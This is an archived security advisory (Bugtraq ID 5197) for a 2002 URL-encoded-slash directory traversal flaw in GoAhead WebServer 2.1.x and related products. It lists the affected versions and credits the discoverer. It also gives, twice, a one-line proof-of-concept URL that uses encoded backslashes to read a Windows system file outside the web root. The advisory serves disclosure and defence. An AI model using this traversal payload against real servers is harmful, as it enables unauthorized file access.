GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
BID:5197
Info
GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
| Bugtraq ID: | 5197 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 10 2002 12:00AM |
| Updated: | Jul 10 2002 12:00AM |
| Credit: | Discovery credited to Matt Moore <[email protected]>. |
| Vulnerable: |
Orange Software Orange Web Server 2.1 MontaVista Software Hard Hat Linux 1.0 GoAhead Software GoAhead WebServer 2.1.5 GoAhead Software GoAhead WebServer 2.1.4 GoAhead Software GoAhead WebServer 2.1.3 GoAhead Software GoAhead WebServer 2.1.2 GoAhead Software GoAhead WebServer 2.1.1 GoAhead Software GoAhead WebServer 2.1 |
| Not Vulnerable: | |
Exploit / POC
GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
The following proof of concept was provided by Matt Moore <[email protected]>:
GoAhead-server/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
The following proof of concept was provided by Matt Moore <[email protected]>:
GoAhead-server/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
References
GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
References:
References:
- GoAhead WebServer Product Homepage (GoAhead Software)